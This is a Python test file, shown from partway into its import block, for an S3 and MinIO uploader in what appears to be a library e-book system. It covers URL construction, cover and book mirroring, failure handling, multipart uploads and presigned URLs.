create,
)
from ..s3 import (
MinIOUploader,
MinIOUploaderConfiguration,
MockS3Client,
MultipartS3Upload,
S3AddressingStyle,
S3Uploader,
S3UploaderConfiguration,
)
from ..testing import DatabaseTest
from ..util.datetime_helpers import datetime_utc, utc_now
class S3UploaderTest(DatabaseTest):
def _integration(self, **settings):
"""Create and configure a simple S3 integration."""
integration = self._external_integration(
ExternalIntegration.S3, ExternalIntegration.STORAGE_GOAL, settings=settings
)
integration.username = settings.get("username", "username")
integration.password = settings.get("password", "password")
return integration
def _add_settings_value(self, settings, key, value):
"""Adds a value to settings dictionary
:param settings: Settings dictionary
:type settings: Dict
:param key: Key
:type key: string
:param value: Value
:type value: Any
:return: Updated settings dictionary
:rtype: Dict
"""
if value:
if settings:
settings[key] = value
else:
settings = {key: value}
return settings
def _create_s3_uploader(
self,
client_class=None,
uploader_class=None,
region=None,
addressing_style=None,
**settings
):
"""Creates a new instance of S3 uploader
:param client_class: (Optional) Custom class to be used instead of boto3's client class
:type client_class: Optional[Type]
        :param uploader_class: (Optional) Custom class which will be used instead of S3Uploader
:type uploader_class: Optional[Type]
:param region: (Optional) S3 region
:type region: Optional[string]
:param addressing_style: (Optional) S3 addressing style
:type addressing_style: Optional[string]
:param settings: Kwargs used for initializing an external integration
        :type settings: Optional[Dict]
        :return: New instance of S3 uploader
:rtype: S3Uploader
"""
settings = self._add_settings_value(
settings, S3UploaderConfiguration.S3_REGION, region
)
settings = self._add_settings_value(
settings, S3UploaderConfiguration.S3_ADDRESSING_STYLE, addressing_style
)
integration = self._integration(**settings)
uploader_class = uploader_class or S3Uploader
return uploader_class(integration, client_class=client_class)
class S3UploaderIntegrationTest(S3UploaderTest):
SIMPLIFIED_TEST_MINIO_ENDPOINT_URL = os.environ.get(
"SIMPLIFIED_TEST_MINIO_ENDPOINT_URL", "http://localhost:9000"
)
SIMPLIFIED_TEST_MINIO_USER = os.environ.get(
"SIMPLIFIED_TEST_MINIO_USER", "minioadmin"
)
SIMPLIFIED_TEST_MINIO_PASSWORD = os.environ.get(
"SIMPLIFIED_TEST_MINIO_PASSWORD", "minioadmin"
)
_, SIMPLIFIED_TEST_MINIO_HOST, _, _, _ = urlsplit(
SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
)
minio_s3_client = None
"""boto3 client connected to locally running MinIO instance"""
s3_client_class = None
"""Factory function used for creating a boto3 client inside S3Uploader"""
@classmethod
def setup_class(cls):
"""Initializes the test suite by creating a boto3 client set up with MinIO credentials"""
super(S3UploaderIntegrationTest, cls).setup_class()
cls.minio_s3_client = boto3.client(
"s3",
aws_access_key_id=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_USER,
aws_secret_access_key=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_PASSWORD,
endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL,
)
cls.s3_client_class = functools.partial(
boto3.client,
endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL,
)
def teardown_method(self):
"""Deinitializes the test suite by removing all the buckets from MinIO"""
super(S3UploaderTest, self).teardown_method()
response = self.minio_s3_client.list_buckets()
for bucket in response["Buckets"]:
bucket_name = bucket["Name"]
response = self.minio_s3_client.list_objects(Bucket=bucket_name)
for object in response.get("Contents", []):
object_key = object["Key"]
self.minio_s3_client.delete_object(Bucket=bucket_name, Key=object_key)
self.minio_s3_client.delete_bucket(Bucket=bucket_name)
def _create_s3_uploader(
self,
client_class=None,
uploader_class=None,
region=None,
addressing_style=None,
**settings
):
"""Creates a new instance of S3 uploader
:param client_class: (Optional) Custom class to be used instead of boto3's client class
:type client_class: Optional[Type]
        :param uploader_class: (Optional) Custom class which will be used instead of S3Uploader
:type uploader_class: Optional[Type]
:param region: (Optional) S3 region
:type region: Optional[string]
:param addressing_style: (Optional) S3 addressing style
:type addressing_style: Optional[string]
:param settings: Kwargs used for initializing an external integration
        :type settings: Optional[Dict]
        :return: New instance of S3 uploader
:rtype: S3Uploader
"""
if settings and "username" not in settings:
self._add_settings_value(
settings, "username", self.SIMPLIFIED_TEST_MINIO_USER
)
if settings and "password" not in settings:
self._add_settings_value(
settings, "password", self.SIMPLIFIED_TEST_MINIO_PASSWORD
)
if not client_class:
client_class = self.s3_client_class
return super(S3UploaderIntegrationTest, self)._create_s3_uploader(
client_class, uploader_class, region, addressing_style, **settings
)
class TestS3Uploader(S3UploaderTest):
def test_names(self):
# The NAME associated with this class must be the same as its
# key in the MirrorUploader implementation registry, and it's
# better if it's the same as the name of the external
# integration.
assert S3Uploader.NAME == ExternalIntegration.S3
assert (
S3Uploader == MirrorUploader.IMPLEMENTATION_REGISTRY[ExternalIntegration.S3]
)
def test_instantiation(self):
integration = self._external_integration(
ExternalIntegration.S3, goal=ExternalIntegration.STORAGE_GOAL
)
integration.username = "your-access-key"
integration.password = "your-secret-key"
integration.setting(
S3UploaderConfiguration.URL_TEMPLATE_KEY
).value = "a transform"
uploader = MirrorUploader.implementation(integration)
assert True == isinstance(uploader, S3Uploader)
# The URL_TEMPLATE_KEY setting becomes the .url_transform
# attribute on the S3Uploader object.
assert "a transform" == uploader.url_transform
@parameterized.expand(
[
("empty_credentials", None, None),
("empty_string_credentials", "", ""),
("non_empty_string_credentials", "username", "password"),
]
)
def test_initialization(self, name, username, password):
# Arrange
settings = {"username": username, "password": password}
integration = self._external_integration(
ExternalIntegration.S3,
goal=ExternalIntegration.STORAGE_GOAL,
settings=settings,
)
client_class = MagicMock()
# Act
S3Uploader(integration, client_class=client_class)
# Assert
assert client_class.call_count == 2
service_name = client_class.call_args_list[0].args[0]
region_name = client_class.call_args_list[0].kwargs["region_name"]
aws_access_key_id = client_class.call_args_list[0].kwargs["aws_access_key_id"]
aws_secret_access_key = client_class.call_args_list[0].kwargs[
"aws_secret_access_key"
]
config = client_class.call_args_list[0].kwargs["config"]
assert service_name == "s3"
assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION
assert aws_access_key_id == None
assert aws_secret_access_key == None
assert config.signature_version == botocore.UNSIGNED
assert (
config.s3["addressing_style"]
== S3UploaderConfiguration.S3_DEFAULT_ADDRESSING_STYLE
)
service_name = client_class.call_args_list[1].args[0]
region_name = client_class.call_args_list[1].kwargs["region_name"]
aws_access_key_id = client_class.call_args_list[1].kwargs["aws_access_key_id"]
aws_secret_access_key = client_class.call_args_list[1].kwargs[
"aws_secret_access_key"
]
assert service_name == "s3"
assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION
assert aws_access_key_id == (username if username != "" else None)
assert aws_secret_access_key == (password if password != "" else None)
assert "config" not in client_class.call_args_list[1].kwargs
def test_custom_client_class(self):
"""You can specify a client class to use instead of boto3.client."""
integration = self._integration()
uploader = S3Uploader(integration, MockS3Client)
assert isinstance(uploader.client, MockS3Client)
def test_get_bucket(self):
buckets = {
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "banana",
S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "bucket",
}
buckets_plus_irrelevant_setting = dict(buckets)
buckets_plus_irrelevant_setting["not-a-bucket-at-all"] = "value"
uploader = self._create_s3_uploader(**buckets_plus_irrelevant_setting)
# This S3Uploader knows about the configured buckets. It
# wasn't informed of the irrelevant 'not-a-bucket-at-all'
# setting.
assert buckets == uploader.buckets
# get_bucket just does a lookup in .buckets
uploader.buckets["foo"] = object()
result = uploader.get_bucket("foo")
assert uploader.buckets["foo"] == result
@parameterized.expand(
[
(
"s3_url_with_path_without_slash",
"a-bucket",
"a-path",
"https://a-bucket.s3.amazonaws.com/a-path",
None,
),
(
"s3_dummy_url_with_path_without_slash",
"dummy",
"dummy",
"https://dummy.s3.amazonaws.com/dummy",
None,
),
(
"s3_path_style_url_with_path_without_slash",
"a-bucket",
"a-path",
"https://s3.amazonaws.com/a-bucket/a-path",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_path_style_dummy_url_with_path_without_slash",
"dummy",
"dummy",
"https://s3.amazonaws.com/dummy/dummy",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_path_with_slash",
"a-bucket",
"/a-path",
"https://a-bucket.s3.amazonaws.com/a-path",
None,
),
(
"s3_path_style_url_with_path_with_slash",
"a-bucket",
"/a-path",
"https://s3.amazonaws.com/a-bucket/a-path",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_custom_region_and_path_without_slash",
"a-bucket",
"a-path",
"https://a-bucket.s3.us-east-2.amazonaws.com/a-path",
"us-east-2",
),
(
"s3_path_style_url_with_custom_region_and_path_without_slash",
"a-bucket",
"a-path",
"https://s3.us-east-2.amazonaws.com/a-bucket/a-path",
"us-east-2",
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_custom_region_and_path_with_slash",
"a-bucket",
"/a-path",
"https://a-bucket.s3.us-east-3.amazonaws.com/a-path",
"us-east-3",
),
(
"s3_path_style_url_with_custom_region_and_path_with_slash",
"a-bucket",
"/a-path",
"https://s3.us-east-3.amazonaws.com/a-bucket/a-path",
"us-east-3",
S3AddressingStyle.PATH.value,
),
(
"custom_http_url_and_path_without_slash",
"http://a-bucket.com/",
"a-path",
"http://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_with_slash",
"http://a-bucket.com/",
"/a-path",
"http://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_without_slash",
"https://a-bucket.com/",
"a-path",
"https://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_with_slash",
"https://a-bucket.com/",
"/a-path",
"https://a-bucket.com/a-path",
None,
),
]
)
def test_url(
self, name, bucket, path, expected_result, region=None, addressing_style=None
):
# Arrange
uploader = self._create_s3_uploader(
region=region, addressing_style=addressing_style
)
# Act
result = uploader.url(bucket, path)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"implicit_s3_url_template",
"bucket",
"the key",
"https://bucket.s3.amazonaws.com/the%20key",
),
(
"implicit_s3_url_template_with_custom_region",
"bucket",
"the key",
"https://bucket.s3.us-east-2.amazonaws.com/the%20key",
None,
"us-east-2",
),
(
"explicit_s3_url_template",
"bucket",
"the key",
"https://bucket.s3.amazonaws.com/the%20key",
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT,
),
(
"explicit_s3_url_template_with_custom_region",
"bucket",
"the key",
"https://bucket.s3.us-east-2.amazonaws.com/the%20key",
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT,
"us-east-2",
),
(
"http_url_template",
"bucket",
"the këy",
"http://bucket/the%20k%C3%ABy",
S3UploaderConfiguration.URL_TEMPLATE_HTTP,
),
(
"https_url_template",
"bucket",
"the këy",
"https://bucket/the%20k%C3%ABy",
S3UploaderConfiguration.URL_TEMPLATE_HTTPS,
),
]
)
def test_final_mirror_url(
self, name, bucket, key, expected_result, url_transform=None, region=None
):
# Arrange
uploader = self._create_s3_uploader(region=region)
if url_transform:
uploader.url_transform = url_transform
# Act
result = uploader.final_mirror_url(bucket, key)
# Assert
if not url_transform:
assert (
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT == uploader.url_transform
)
assert result == expected_result
def test_key_join(self):
"""Test the code used to build S3 keys from parts."""
parts = ["Gutenberg", b"Gutenberg ID", 1234, "Die Flügelmaus+.epub"]
assert (
"Gutenberg/Gutenberg%20ID/1234/Die%20Fl%C3%BCgelmaus%2B.epub"
== S3Uploader.key_join(parts)
)
@parameterized.expand(
[
(
"with_gutenberg_cover_generator_data_source",
"test-book-covers-s3-bucket",
DataSource.GUTENBERG_COVER_GENERATOR,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/Gutenberg%20Illustrated/",
),
(
"with_overdrive_data_source",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/Overdrive/",
),
(
"with_overdrive_data_source_and_scaled_size",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/scaled/300/Overdrive/",
300,
),
(
"with_gutenberg_cover_generator_data_source_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.GUTENBERG_COVER_GENERATOR,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Gutenberg%20Illustrated/",
None,
"us-east-3",
),
(
"with_overdrive_data_source_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Overdrive/",
None,
"us-east-3",
),
(
"with_overdrive_data_source_and_scaled_size_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/scaled/300/Overdrive/",
300,
"us-east-3",
),
]
)
def test_cover_image_root(
self,
name,
bucket,
data_source_name,
expected_result,
scaled_size=None,
region=None,
):
# Arrange
uploader = self._create_s3_uploader(region=region)
data_source = DataSource.lookup(self._db, data_source_name)
# Act
result = uploader.cover_image_root(bucket, data_source, scaled_size=scaled_size)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_default_region",
"test-open-access-s3-bucket",
"https://test-open-access-s3-bucket.s3.amazonaws.com/",
),
(
"with_custom_region",
"test-open-access-s3-bucket",
"https://test-open-access-s3-bucket.s3.us-east-3.amazonaws.com/",
"us-east-3",
),
]
)
def test_content_root(self, name, bucket, expected_result, region=None):
# Arrange
uploader = self._create_s3_uploader(region=region)
# Act
result = uploader.content_root(bucket)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"s3_url",
"test-marc-s3-bucket",
"SHORT",
"https://test-marc-s3-bucket.s3.amazonaws.com/SHORT/",
),
(
"s3_url_with_custom_region",
"test-marc-s3-bucket",
"SHORT",
"https://test-marc-s3-bucket.s3.us-east-2.amazonaws.com/SHORT/",
"us-east-2",
),
("custom_http_url", "http://my-feed/", "SHORT", "http://my-feed/SHORT/"),
("custom_https_url", "https://my-feed/", "SHORT", "https://my-feed/SHORT/"),
]
)
def test_marc_file_root(
self, name, bucket, library_name, expected_result, region=None
):
# Arrange
uploader = self._create_s3_uploader(region=region)
library = self._library(short_name=library_name)
# Act
result = uploader.marc_file_root(bucket, library)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_identifier",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.epub",
),
(
"with_custom_extension",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf",
"pdf",
),
(
"with_custom_dotted_extension",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf",
".pdf",
),
(
"with_custom_data_source",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK.epub",
None,
DataSource.UNGLUE_IT,
),
(
"with_custom_title",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK/On%20Books.epub",
None,
None,
"On Books",
),
(
"with_custom_extension_and_title_and_data_source",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
),
(
"with_custom_extension_and_title_and_data_source_and_region",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
"us-east-3",
),
(
"with_protected_access_and_custom_extension_and_title_and_data_source_and_region",
{S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
"us-east-3",
False,
),
]
)
def test_book_url(
self,
name,
buckets,
identifier,
expected_result,
extension=None,
data_source_name=None,
title=None,
region=None,
open_access=True,
):
# Arrange
identifier = self._identifier(foreign_id=identifier)
uploader = self._create_s3_uploader(region=region, **buckets)
parameters = {"identifier": identifier, "open_access": open_access}
if extension:
parameters["extension"] = extension
if title:
parameters["title"] = title
if data_source_name:
data_source = DataSource.lookup(self._db, DataSource.UNGLUE_IT)
parameters["data_source"] = data_source
# Act
result = uploader.book_url(**parameters)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"without_scaled_size",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename",
),
(
"without_scaled_size_and_with_custom_region",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename",
None,
"us-east-3",
),
(
"with_scaled_size",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename",
601,
),
(
"with_scaled_size_and_custom_region",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.us-east-3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename",
601,
"us-east-3",
),
]
)
def test_cover_image_url(
self,
name,
buckets,
data_source_name,
identifier,
filename,
expected_result,
scaled_size=None,
region=None,
):
# identifier = self._identifier(foreign_id="ABOOK")
# buckets = {S3Uploader.BOOK_COVERS_BUCKET_KEY : 'thecovers'}
# uploader = self._uploader(**buckets)
# m = uploader.cover_image_url
#
# unglueit = DataSource.lookup(self._db, DataSource.UNGLUE_IT)
# identifier = self._identifier(foreign_id="ABOOK")
# eq_('https://s3.amazonaws.com/thecovers/scaled/601/unglue.it/Gutenberg+ID/ABOOK/filename',
# m(unglueit, identifier, "filename", scaled_size=601))
# Arrange
data_source = DataSource.lookup(self._db, data_source_name)
identifier = self._identifier(foreign_id=identifier)
uploader = self._create_s3_uploader(region=region, **buckets)
# Act
result = uploader.cover_image_url(
data_source, identifier, filename, scaled_size=scaled_size
)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_s3_bucket_and_end_time",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 1, 0, 0, 0),
"https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00/Lane.mrc",
),
(
"with_s3_bucket_and_end_time_and_start_time",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
(
"with_s3_bucket_and_end_time_and_start_time_and_custom_region",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc.s3.us-east-2.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
"us-east-2",
),
(
"with_http_bucket_and_end_time_and_start_time",
"http://marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"http://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
(
"with_https_bucket_and_end_time_and_start_time",
"https://marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
]
)
def test_marc_file_url(
self,
name,
bucket,
library_name,
lane_name,
end_time,
expected_result,
start_time=None,
region=None,
):
# Arrange
library = self._library(short_name=library_name)
lane = self._lane(display_name=lane_name)
buckets = {S3UploaderConfiguration.MARC_BUCKET_KEY: bucket}
uploader = self._create_s3_uploader(region=region, **buckets)
# Act
result = uploader.marc_file_url(library, lane, end_time, start_time)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"s3_path_style_request_without_region",
"https://s3.amazonaws.com/bucket/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_path_style_request_with_region",
"https://s3.us-east-2.amazonaws.com/bucket/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_global_endpoint",
"https://bucket.s3.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_dashed_region",
"https://bucket.s3-us-east-2.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_dotted_region",
"https://bucket.s3.us-east-2.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"http_url",
"http://book-covers.nypl.org/directory/filename.jpg",
("book-covers.nypl.org", "directory/filename.jpg"),
),
(
"https_url",
"https://book-covers.nypl.org/directory/filename.jpg",
("book-covers.nypl.org", "directory/filename.jpg"),
),
(
"http_url_with_escaped_symbols",
"http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg",
("book-covers.nypl.org", "directory/filename with spaces!.jpg"),
),
(
"http_url_with_escaped_symbols_but_unquote_set_to_false",
"http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg",
("book-covers.nypl.org", "directory/filename+with+spaces%21.jpg"),
False,
),
]
)
def test_split_url(self, name, url, expected_result, unquote=True):
# Arrange
s3_uploader = self._create_s3_uploader()
# Act
result = s3_uploader.split_url(url, unquote)
# Assert
assert result == expected_result
def test_mirror_one(self):
edition, pool = self._edition(with_license_pool=True)
original_cover_location = "http://example.com/a-cover.png"
content = open(self.sample_cover_path("test-book-cover.png"), "rb").read()
cover, ignore = pool.add_link(
Hyperlink.IMAGE,
original_cover_location,
edition.data_source,
Representation.PNG_MEDIA_TYPE,
content=content,
)
cover_rep = cover.resource.representation
assert None == cover_rep.mirrored_at
original_epub_location = "https://books.com/a-book.epub"
epub, ignore = pool.add_link(
Hyperlink.OPEN_ACCESS_DOWNLOAD,
original_epub_location,
edition.data_source,
Representation.EPUB_MEDIA_TYPE,
content="i'm an epub",
)
epub_rep = epub.resource.representation
assert None == epub_rep.mirrored_at
s3 = self._create_s3_uploader(client_class=MockS3Client)
# Mock final_mirror_url so we can verify that it's called with
# the right arguments
def mock_final_mirror_url(bucket, key):
return "final_mirror_url was called with bucket %s, key %s" % (bucket, key)
s3.final_mirror_url = mock_final_mirror_url
book_url = "http://books-go/here.epub"
cover_url = "http://s3.amazonaws.com/covers-go/here.png"
s3.mirror_one(cover.resource.representation, cover_url)
s3.mirror_one(epub.resource.representation, book_url)
[
[data1, bucket1, key1, args1, ignore1],
[data2, bucket2, key2, args2, ignore2],
] = s3.client.uploads
# Both representations have had .mirror_url set and been
# mirrored to those URLs.
assert data1.startswith(b"\x89")
assert "covers-go" == bucket1
assert "here.png" == key1
assert Representation.PNG_MEDIA_TYPE == args1["ContentType"]
assert (utc_now() - cover_rep.mirrored_at).seconds < 10
assert b"i'm an epub" == data2
assert "books-go" == bucket2
assert "here.epub" == key2
assert Representation.EPUB_MEDIA_TYPE == args2["ContentType"]
# In both cases, mirror_url was set to the result of final_mirror_url.
assert (
"final_mirror_url was called with bucket books-go, key here.epub"
== epub_rep.mirror_url
)
assert (
"final_mirror_url was called with bucket covers-go, key here.png"
== cover_rep.mirror_url
)
# mirrored-at was set when the representation was 'mirrored'
for rep in epub_rep, cover_rep:
assert (utc_now() - rep.mirrored_at).seconds < 10
def test_mirror_failure(self):
edition, pool = self._edition(with_license_pool=True)
original_epub_location = "https://books.com/a-book.epub"
epub, ignore = pool.add_link(
Hyperlink.OPEN_ACCESS_DOWNLOAD,
original_epub_location,
edition.data_source,
Representation.EPUB_MEDIA_TYPE,
content="i'm an epub",
)
epub_rep = epub.resource.representation
uploader = self._create_s3_uploader(MockS3Client)
# A network failure is treated as a transient error.
uploader.client.fail_with = BotoCoreError()
uploader.mirror_one(epub_rep, self._url)
assert None == epub_rep.mirrored_at
assert None == epub_rep.mirror_exception
# An S3 credential failure is treated as a transient error.
response = dict(
Error=dict(
Code=401,
Message="Bad credentials",
)
)
uploader.client.fail_with = ClientError(response, "SomeOperation")
uploader.mirror_one(epub_rep, self._url)
assert None == epub_rep.mirrored_at
assert None == epub_rep.mirror_exception
# Because the file was not successfully uploaded,
        # final_mirror_url was never called and mirror_url
        # was not set.
assert None == epub_rep.mirror_url
# A bug in the code is not treated as a transient error --
# the exception propagates through.
uploader.client.fail_with = Exception("crash!")
pytest.raises(Exception, uploader.mirror_one, epub_rep, self._url)
def test_svg_mirroring(self):
edition, pool = self._edition(with_license_pool=True)
original = self._url
# Create an SVG cover for the book.
svg = """<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="50">
<ellipse cx="50" cy="25" rx="50" ry="25" style="fill:blue;"/>
</svg>"""
hyperlink, ignore = pool.add_link(
Hyperlink.IMAGE,
original,
edition.data_source,
Representation.SVG_MEDIA_TYPE,
content=svg,
)
# 'Upload' it to S3.
s3 = self._create_s3_uploader(MockS3Client)
s3.mirror_one(hyperlink.resource.representation, self._url)
[[data, bucket, key, args, ignore]] = s3.client.uploads
assert Representation.SVG_MEDIA_TYPE == args["ContentType"]
assert b"svg" in data
assert b"PNG" not in data
def test_multipart_upload(self):
class MockMultipartS3Upload(MultipartS3Upload):
completed = None
aborted = None
def __init__(self, uploader, representation, mirror_to):
self.parts = []
MockMultipartS3Upload.completed = False
MockMultipartS3Upload.aborted = False
def upload_part(self, content):
self.parts.append(content)
def complete(self):
MockMultipartS3Upload.completed = True
def abort(self):
MockMultipartS3Upload.aborted = True
rep, ignore = create(
self._db,
Representation,
url="http://books.mrc",
media_type=Representation.MARC_MEDIA_TYPE,
)
s3 = self._create_s3_uploader(MockS3Client)
# Successful upload
with s3.multipart_upload(
rep, rep.url, upload_class=MockMultipartS3Upload
) as upload:
assert [] == upload.parts
assert False == upload.completed
assert False == upload.aborted
upload.upload_part("Part 1")
upload.upload_part("Part 2")
assert ["Part 1", "Part 2"] == upload.parts
assert True == MockMultipartS3Upload.completed
assert False == MockMultipartS3Upload.aborted
assert None == rep.mirror_exception
class FailingMultipartS3Upload(MockMultipartS3Upload):
def upload_part(self, content):
raise Exception("Error!")
# Failed during upload
with s3.multipart_upload(
rep, rep.url, upload_class=FailingMultipartS3Upload
) as upload:
upload.upload_part("Part 1")
assert False == MockMultipartS3Upload.completed
assert True == MockMultipartS3Upload.aborted
assert "Error!" == rep.mirror_exception
class AnotherFailingMultipartS3Upload(MockMultipartS3Upload):
def complete(self):
raise Exception("Error!")
rep.mirror_exception = None
# Failed during completion
with s3.multipart_upload(
rep, rep.url, upload_class=AnotherFailingMultipartS3Upload
) as upload:
upload.upload_part("Part 1")
assert False == MockMultipartS3Upload.completed
assert True == MockMultipartS3Upload.aborted
assert "Error!" == rep.mirror_exception
@parameterized.expand(
[
(
"default_expiration_parameter",
None,
int(S3UploaderConfiguration.S3_DEFAULT_PRESIGNED_URL_EXPIRATION),
),
(
"empty_expiration_parameter",
{S3UploaderConfiguration.S3_PRESIGNED_URL_EXPIRATION: 100},
100,
),
]
)
def test_sign_url(self, name, expiration_settings, expected_expiration):
# Arrange
region = "us-east-1"
bucket = "bucket"
filename = "filename"
url = "https://{0}.s3.{1}.amazonaws.com/{2}".format(bucket, region, filename)
expected_url = url + "?AWSAccessKeyId=KEY&Expires=1&Signature=S"
settings = expiration_settings if expiration_settings else {}
s3_uploader = self._create_s3_uploader(region=region, **settings)
s3_uploader.split_url = MagicMock(return_value=(bucket, filename))
s3_uploader.client.generate_presigned_url = MagicMock(return_value=expected_url)
# Act
result = s3_uploader.sign_url(url)
# Assert
assert result == expected_url
s3_uploader.split_url.assert_called_once_with(url)
s3_uploader.client.generate_presigned_url.assert_called_once_with(
"get_object",
ExpiresIn=expected_expiration,
Params={"Bucket": bucket, "Key": filename},
)
class TestMultiPartS3Upload(S3UploaderTest):
def _representation(self):
rep, ignore = create(
self._db,
Representation,
url="http://bucket/books.mrc",
media_type=Representation.MARC_MEDIA_TYPE,
)
return rep
def test_init(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
assert uploader == upload.uploader
assert rep == upload.representation
assert "bucket" == upload.bucket
assert "books.mrc" == upload.filename
assert 1 == upload.part_number
assert [] == upload.parts
assert 1 == upload.upload.get("UploadId")
uploader.client.fail_with = Exception("Error!")
pytest.raises(Exception, MultipartS3Upload, uploader, rep, rep.url)
